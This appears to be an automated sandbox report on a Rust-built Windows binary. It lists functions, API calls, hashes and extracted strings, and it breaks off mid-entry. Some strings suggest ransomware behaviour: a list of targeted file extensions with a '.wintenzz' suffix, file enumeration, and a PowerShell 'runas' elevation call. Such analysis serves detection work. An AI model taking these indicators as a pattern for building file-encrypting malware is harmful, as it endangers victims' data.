Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7f52182efcce109e01a81f866d3f9056a280bac5d4c5a8a76daf7f97807c0bd8
Instruction ID: 8a8ad064c6c778d43a22bc1fa9ccd960da299c2db3e31766bb905bbaec05103a
Opcode Fuzzy Hash: 7f52182efcce109e01a81f866d3f9056a280bac5d4c5a8a76daf7f97807c0bd8
Instruction Fuzzy Hash: 0CF06236618A5286E770AB65F840B96B3A0AB48794F608230EAAC877D4DF7CD145CB10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF78D1F3B40, Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 348COMMON

Download Yara Rule

Strings

kernel32SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs, xrefs: 00007FF78D1F3B69
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1F3F9F
Box<Any><unnamed>, xrefs: 00007FF78D1F3B43
AcquireSRWLockExclusive, xrefs: 00007FF78D1F3FE0
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1F3B47, 00007FF78D1F3FDC

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$Box<Any><unnamed>$called `Result::unwrap()` on an `Err` value$kernel32SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs
API String ID: 0-1497540586
Opcode ID: ad6f405b692a1617f19af26e6cc8c7392c39aca0ebffb8baed074b0e1f548a25
Instruction ID: 5f232fa13be1a888cd7e35d0669eb969a36605f3e805bc42117de577a34b4d03
Opcode Fuzzy Hash: ad6f405b692a1617f19af26e6cc8c7392c39aca0ebffb8baed074b0e1f548a25
Instruction Fuzzy Hash: 8EC13862F1CA9244F754AB25A8043FDAA51BF04798FA64632EF1D077C9FE39D489C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1B2CB0, Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 498COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1B3244
memmove.VCRUNTIME140 ref: 00007FF78D1B3373

Strings

docx, xrefs: 00007FF78D1B2DC0
xlsx, xrefs: 00007FF78D1B2EEB
pdfdocxdoctxtxlsxlsxodtodspptpptxpngjpgmp3mp4.wintenzz, xrefs: 00007FF78D1B2D62
pptx, xrefs: 00007FF78D1B3016

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: docx$pdfdocxdoctxtxlsxlsxodtodspptpptxpngjpgmp3mp4.wintenzz$pptx$xlsx
API String ID: 2162964266-1063182948
Opcode ID: 9b116ed71f4b79ea41bf5fb364c1e54b1bddfb57d624665eb5ea7e714d610cb8
Instruction ID: e1c358b43e079617e424cd09b90c75f7af5c6079dcb4d61edc2c96bc066e84a5
Opcode Fuzzy Hash: 9b116ed71f4b79ea41bf5fb364c1e54b1bddfb57d624665eb5ea7e714d610cb8
Instruction Fuzzy Hash: CD229B61E0D64385EE55BB21E8502BCABA1FF49784FEA5436EA0D47785FE3CE458C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F42F0, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 262fileCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1F47E3
FindNextFileW.KERNEL32 ref: 00007FF78D1F47EE
FindNextFileW.KERNEL32 ref: 00007FF78D1F4822
memmove.VCRUNTIME140 ref: 00007FF78D1F487F
memmove.VCRUNTIME140 ref: 00007FF78D1F48A2
GetLastError.KERNEL32 ref: 00007FF78D1F48A9
GetLastError.KERNEL32 ref: 00007FF78D1F48BC

Strings

., xrefs: 00007FF78D1F482F

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileFindLastNextmemmove$memset
String ID: .
API String ID: 2525592065-248832578
Opcode ID: 1816432199bc7af33b20d6eafd5051f9abc2b500d51e0ccf658e7d8d69d91d40
Instruction ID: 9b7779e942d298d6e001c1d1f6e86db13494d068fea3caaac926f155943683a5
Opcode Fuzzy Hash: 1816432199bc7af33b20d6eafd5051f9abc2b500d51e0ccf658e7d8d69d91d40
Instruction Fuzzy Hash: 58F11D22D0DBC592F2375B28A6013F9A364FFE9319F04A315DFD812956EB79A2E5C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1E4D90, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1E4E1E
SetLastError.KERNEL32 ref: 00007FF78D1E4EAF
GetEnvironmentVariableW.KERNEL32 ref: 00007FF78D1E4EC1
GetLastError.KERNEL32 ref: 00007FF78D1E4ECC
GetLastError.KERNEL32 ref: 00007FF78D1E4EE1
GetLastError.KERNEL32 ref: 00007FF78D1E4F41

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1E4D97, 00007FF78D1E50BC

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnvironmentVariablememset
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 3677577337-3047668079
Opcode ID: 7cf87f9a767b99056a62ba20db4aef336db3f747ba96c75f55d9ec91a82c3888
Instruction ID: 06e54ca22126fcabb08a713014682e6f15b927a965931de7e4b39ae149bc0595
Opcode Fuzzy Hash: 7cf87f9a767b99056a62ba20db4aef336db3f747ba96c75f55d9ec91a82c3888
Instruction Fuzzy Hash: 0781A662E08BC285E761AF61F8807E9A764FF04B98F914135DE5C57789EF38D649C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1E4300, Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 215COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF78D1E44A2

Strings

inconsistent park state, xrefs: 00007FF78D1E45F6
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1E44CD, 00007FF78D1E45BA
ReleaseSRWLockExclusive, xrefs: 00007FF78D1E4552
SleepConditionVariableSRW, xrefs: 00007FF78D1E4402
use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF78D1E45D8
AcquireSRWLockExclusive, xrefs: 00007FF78D1E4510
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1E463E

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive$SleepConditionVariableSRW$called `Result::unwrap()` on an `Err` value$inconsistent park state$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
API String ID: 3988221542-1218418010
Opcode ID: 476a34e517663de6707aabd87a35e66038b8b77904ee6b7f04dc8b6b129bae6e
Instruction ID: 3c103add3146f9656d326a1cdc1ed796eb63df2cbd36aff9cf85127e5817b7e6
Opcode Fuzzy Hash: 476a34e517663de6707aabd87a35e66038b8b77904ee6b7f04dc8b6b129bae6e
Instruction Fuzzy Hash: 00B13C21A0DB8299EB11EF60F8803E9ABA5FF08758FA54135DA4D43795EF3CE449C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F5960, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 226windowCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1F59A6
GetModuleHandleW.KERNEL32 ref: 00007FF78D1F59BF
FormatMessageW.KERNEL32 ref: 00007FF78D1F5A05
GetLastError.KERNEL32 ref: 00007FF78D1F5BA5

Strings

assertion failed: self.is_char_boundary(new_len)/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs, xrefs: 00007FF78D1F5B8B
NTDLL.DLL, xrefs: 00007FF78D1F59B8

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFormatHandleLastMessageModulememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs
API String ID: 1434010500-2033829299
Opcode ID: 1796e5168d3cd1b6465fb0b1be26defe1a49b0379b8526fce12db40180c71a3f
Instruction ID: b373491cbdfd9b958d52268a2086f7a9421941b646819311ff0ccc8c37c296f6
Opcode Fuzzy Hash: 1796e5168d3cd1b6465fb0b1be26defe1a49b0379b8526fce12db40180c71a3f
Instruction Fuzzy Hash: 93A1A532E0D6C389F7719F20E8447F8A6A5FF04394F954231DA9D06AC9EF78928AD350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1EF9A0, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF78D1EF9C1
TlsGetValue.KERNEL32 ref: 00007FF78D1EF9DF
TlsSetValue.KERNEL32(00000000,?,?,00007FF78D1E3E44,?,?,?,?,?,?,00000000,00007FF78D1F0EEC), ref: 00007FF78D1EFAD1
TlsSetValue.KERNEL32 ref: 00007FF78D1EFBA4
TlsGetValue.KERNEL32 ref: 00007FF78D1EFC59

Strings

Box<Any><unnamed>, xrefs: 00007FF78D1EFB73

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value
String ID: Box<Any><unnamed>
API String ID: 3702945584-3419748868
Opcode ID: 9ad829b700e91764e9ef3a8379bf29c2ff51101da05fff3ef47fd935617b8602
Instruction ID: 5080005fbcc63a642cfced316e2874fce760f342d0ee3a13c4a94a0d67861abc
Opcode Fuzzy Hash: 9ad829b700e91764e9ef3a8379bf29c2ff51101da05fff3ef47fd935617b8602
Instruction Fuzzy Hash: F6619012F1D69782FA54BB51B9112B8ABA1BF88BD4FA58431DD0D0B791FE3CA409C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1E4810, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 165COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF78D1E4926

Strings

failed to generate unique thread ID: bitspace exhausted, xrefs: 00007FF78D1E4A35
called `Option::unwrap()` on a `None` value, xrefs: 00007FF78D1E4A4F
thread name may not contain interior null bytes, xrefs: 00007FF78D1E4A17
ReleaseSRWLockExclusive, xrefs: 00007FF78D1E4973
AcquireSRWLockExclusive, xrefs: 00007FF78D1E4935

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted$thread name may not contain interior null bytes
API String ID: 3988221542-3361540753
Opcode ID: c24efa7647b7e9d2cca34adb8555bdfd77039f3793dcb1537c782a6d50ba0680
Instruction ID: 32066a854e6b7f34fb98cc1b9d0aa4a9821cb68493cbfdf570b25736ddc8aa83
Opcode Fuzzy Hash: c24efa7647b7e9d2cca34adb8555bdfd77039f3793dcb1537c782a6d50ba0680
Instruction Fuzzy Hash: ED71B461E0CB8295FB11AF64E8402F8A7B0BF58758FE58635DA5C12695FF3CE589C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F61C0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1F61FC
SetLastError.KERNEL32 ref: 00007FF78D1F628F
GetModuleFileNameW.KERNEL32 ref: 00007FF78D1F629C
GetLastError.KERNEL32 ref: 00007FF78D1F62A7
GetLastError.KERNEL32 ref: 00007FF78D1F62C0
GetLastError.KERNEL32 ref: 00007FF78D1F633B

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$FileModuleNamememset
String ID:
API String ID: 3770714783-0
Opcode ID: 51e139b58de852ebb2b689ce3c64ebb12ff8180ab3f6783a453e80b9d5067cdb
Instruction ID: fc1a2554677597d9e3d2a0ebf3463b993ba306a9feca8f8df6aef1097d905b40
Opcode Fuzzy Hash: 51e139b58de852ebb2b689ce3c64ebb12ff8180ab3f6783a453e80b9d5067cdb
Instruction Fuzzy Hash: 09510822E0C78241F771AF21ED447F9A654BF54BA8FA48132DE5C167C5EE78D68AC310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1E4B60, Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1E4B9C
SetLastError.KERNEL32 ref: 00007FF78D1E4C2F
GetCurrentDirectoryW.KERNEL32 ref: 00007FF78D1E4C39
GetLastError.KERNEL32 ref: 00007FF78D1E4C44
GetLastError.KERNEL32 ref: 00007FF78D1E4C5D
GetLastError.KERNEL32 ref: 00007FF78D1E4CD8

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$CurrentDirectorymemset
String ID:
API String ID: 609395768-0
Opcode ID: 884a043a6a13a7c54195aae58ef7c0bed6987cd30a8a2a6cae80ae180de2f19d
Instruction ID: 44686c386199b93ec4554504eaac493340452c16b2b05e5a6f6610b600716f31
Opcode Fuzzy Hash: 884a043a6a13a7c54195aae58ef7c0bed6987cd30a8a2a6cae80ae180de2f19d
Instruction Fuzzy Hash: B351E512E0C78242E771AE21B8447F99654BF58BA8F658532DE5C177C5EE78E289C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F3140, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 115COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF78D1EE000), ref: 00007FF78D1F31D2

Strings

WakeConditionVariablerwlocks not available, xrefs: 00007FF78D1F3266
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1F32F7
ReleaseSRWLockExclusive, xrefs: 00007FF78D1F322B
inconsistent state in unpark, xrefs: 00007FF78D1F32C8
AcquireSRWLockExclusive, xrefs: 00007FF78D1F31ED

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$WakeConditionVariablerwlocks not available$called `Result::unwrap()` on an `Err` value$inconsistent state in unpark
API String ID: 3988221542-92624130
Opcode ID: a79f882acd7d46f2c72c06117fa98afe71cb0938a838115e6ce315179775cf80
Instruction ID: 9b1843e15ff831d411c1316531ee76395519263cb24009889ba0c3e09c2f8cdc
Opcode Fuzzy Hash: a79f882acd7d46f2c72c06117fa98afe71cb0938a838115e6ce315179775cf80
Instruction Fuzzy Hash: 95413421E0DB0394FE21BB54B4402F8AAA0BF15794FE54536CA5D037A1FF2CA54DC230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D246760, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 00007FF78D246845
VerSetConditionMask.KERNEL32 ref: 00007FF78D246854
VerSetConditionMask.KERNEL32 ref: 00007FF78D246866
VerSetConditionMask.KERNEL32 ref: 00007FF78D246878
VerSetConditionMask.KERNEL32 ref: 00007FF78D24688E
VerifyVersionInfoA.KERNEL32 ref: 00007FF78D2468A1

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 9c63e33cea82d0a9a1abd3556f4baaa293abf56d2c71893ed2b0bf0ac7f7e71d
Instruction ID: 0f449723ec1ff95686a8fd33c61a458823c1ec5503216fa30a0ed2391c9a7564
Opcode Fuzzy Hash: 9c63e33cea82d0a9a1abd3556f4baaa293abf56d2c71893ed2b0bf0ac7f7e71d
Instruction Fuzzy Hash: A341E722E1C68286F2709B11A4147FAF3A1FBD5701FA09235EDCD42A54EF3DE588DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F5700, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5753
DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5767
EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5785

Strings

cannot recursively lock a mutexlibrary\std\src\sys\windows\mutex.rs, xrefs: 00007FF78D1F5810
AcquireSRWLockExclusive, xrefs: 00007FF78D1F579B, 00007FF78D1F57DD

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitialize
String ID: AcquireSRWLockExclusive$cannot recursively lock a mutexlibrary\std\src\sys\windows\mutex.rs
API String ID: 542031744-94582581
Opcode ID: 082a1191e07e66b35cea79e3c950327ebb236a81664a7af5da94a99b05c387e4
Instruction ID: 03d905a8f6d80205e928f807195e36977d02777f7e9992d512157495b07a1176
Opcode Fuzzy Hash: 082a1191e07e66b35cea79e3c950327ebb236a81664a7af5da94a99b05c387e4
Instruction Fuzzy Hash: 87316820F0E61781FA55BB11BA503F59A52BF84BD0FE14035CA4D07B92FE2CA88AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1C83C0, Relevance: 7.9, APIs: 6, Instructions: 421COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1C8425
memmove.VCRUNTIME140 ref: 00007FF78D1C879D

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: fae744ec27734a5cc88a22cfeb3ac995dbd0736f3cc5eb8fa9dab90b988c2fb1
Instruction ID: d8d538aa529e255483be540c84bfdfcb606d01f1f42cbd009c5d268b6609e1c7
Opcode Fuzzy Hash: fae744ec27734a5cc88a22cfeb3ac995dbd0736f3cc5eb8fa9dab90b988c2fb1
Instruction Fuzzy Hash: F3324C22D18BC588F7719F28D8417F96760FBA476CF559321DF8C1AA56EF28A2C9C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1C6C80, Relevance: 7.8, APIs: 6, Instructions: 341COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1C6DC7
memmove.VCRUNTIME140 ref: 00007FF78D1C6EB0
memmove.VCRUNTIME140 ref: 00007FF78D1C6F1C
memmove.VCRUNTIME140 ref: 00007FF78D1C6F59
memmove.VCRUNTIME140 ref: 00007FF78D1C717D
memmove.VCRUNTIME140 ref: 00007FF78D1C71BB

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 7d37d18a0c80621d49e651cdfaa0ce602efa440c45cbe1501afa20e2b09344ec
Instruction ID: d31ce63c492dbd398fc2d30354e36a46f9dfbe653371e81416f24901885a0537
Opcode Fuzzy Hash: 7d37d18a0c80621d49e651cdfaa0ce602efa440c45cbe1501afa20e2b09344ec
Instruction Fuzzy Hash: 0F026D62E08BC288EB71DF25E8443E87760FB54798F515125DF4D0BA59EF38E299C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1B4890, Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78D1E4B60: memset.VCRUNTIME140 ref: 00007FF78D1E4B9C
Part of subcall function 00007FF78D1E4B60: SetLastError.KERNEL32 ref: 00007FF78D1E4C2F
Part of subcall function 00007FF78D1E4B60: GetCurrentDirectoryW.KERNEL32 ref: 00007FF78D1E4C39
Part of subcall function 00007FF78D1E4B60: GetLastError.KERNEL32 ref: 00007FF78D1E4C44
Part of subcall function 00007FF78D1E4B60: GetLastError.KERNEL32 ref: 00007FF78D1E4C5D

memmove.VCRUNTIME140 ref: 00007FF78D1B4A4A

Strings

powershell-VerbrunasStart-Process, xrefs: 00007FF78D1B4A1D
C:\lasfnmrqqeopERROR\, xrefs: 00007FF78D1B48DD, 00007FF78D1B49BC
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1B4E19
(get-location).Drive.Name, xrefs: 00007FF78D1B4A4F

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$CurrentDirectorymemmovememset
String ID: (get-location).Drive.Name$C:\lasfnmrqqeopERROR\$called `Result::unwrap()` on an `Err` value$powershell-VerbrunasStart-Process
API String ID: 3954027298-2030083228
Opcode ID: 1804e24c5b218ab8e9ec928d163b6308cad89a98df8ba83324e5e457482eeed6
Instruction ID: 355749d74b2087b73aadcaf09ff45d1d14240745837f6aaa714acd40498528be
Opcode Fuzzy Hash: 1804e24c5b218ab8e9ec928d163b6308cad89a98df8ba83324e5e457482eeed6
Instruction Fuzzy Hash: 84F14F35A0CBC289EB71AF25D8417E97761FF58758F948121DA4C0BB99EF39D289C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D226DD0, Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000001,00007FF78D2168D1,?,?,?,?,00007FF78D1DA939), ref: 00007FF78D226DE7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000001,00007FF78D2168D1,?,?,?,?,00007FF78D1DA939), ref: 00007FF78D226E26

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
